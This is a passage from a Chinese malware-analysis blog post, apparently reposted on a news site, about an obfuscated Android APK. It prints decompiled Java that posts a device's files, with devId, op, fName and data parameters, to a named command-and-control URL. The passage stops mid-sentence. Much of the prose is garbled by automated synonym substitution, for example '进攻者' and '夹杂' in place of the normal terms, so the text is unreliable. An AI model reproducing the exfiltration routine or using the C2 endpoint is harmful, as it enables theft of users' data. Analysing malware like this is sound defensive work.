|
进攻者行使了器材ProGuard来对字符串和函数名举办了夹杂,以是前述的我找不到任何URL字符串的缘故起因就在于此。ProGuard是一个压缩、优化和夹杂Java字节码文件的免费的器材,它可以删除无用的类、字段、要领和属性。解码之后,可以看到,个中包括了以下信息:
- private static final String f5386b = "POST"
- private static final String f5387c = "Content-Type"
- private static final String f5388d = "Application/x-www-form-urlencoded"
接着,我搜查了有哪些函数间接挪用了 “HttpURLConnection” 类函数m7665a,功效是这样的:
- private static void m7672b(File file) {
- C1548e.m7665a(C1489a.m7489b(), C1551f.m7671a(file, C1489a.f5198i)).trim();
- }
- public static String m7489b() {
- return f5199j + C1489a.m7487a() + f5201l;
- }
- public static String m7487a() {
- C1545b c1545b = new C1545b(f5203n.getFilesDir().getAbsolutePath(), f5202m);
- if (c1545b.exists()) {
- String str = new String(c1545b.m7647a());
- if (!(str == null || str.isEmpty())) {
- return str;
- }
- }
- return f5204o;
- }
颠末说明,我发明,函数m7672b在函数m7489b中界说URL链接时挪用了函数m7665a,而在m7487a函数中,在末端它返回了包括URL链接的f5204o。解码之后,该APK哀求的长途处事器URL链接为:
HTTP://WWW.GLANCELOVE.COM/APPS/d/p/OP.PHP
其它,除相识码之后看到的APK内置毗连哀求URL链接,我还发明白许多其余有效的字符串:
- public static final String f5190a = ".ZIP"
- public static final String f5191b = ".DATA"
- public static final String f5192c = ".APK"
- public static final byte[] f5193d = "A".getBytes();
- public static final byte[] f5194e = "B".getBytes();
- public static final byte[] f5195f = "F".getBytes();
- public static final byte[] f5196g = "CCC".getBytes();
- public static final byte[] f5197h = "D".getBytes();
- public static final byte[] f5198i = "E".getBytes();
- public static final String f5199j = "HTTP://"
- public static final String f5200k = "TCP://";
- public static final String f5201l = "/APPS/d/p/OP.PHP"
- public static final String f5202m = "IP.TXT"
- private static Context f5203n = App.m7476a();
- private static String f5204o = "WWW.GLANCELOVE.COM"
- private static byte[] f5394b = "devId="
- private static byte[] f5395c = "&op="
- private static byte[] f5396d = "&fName="
- private static byte[] f5397e = "&data="
- private static String f5398f = "true"
从以上信息中可知,我可以操作参数 devId、op、fName和data来结构一个发往进攻节制处事器 (编辑:湖南网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|
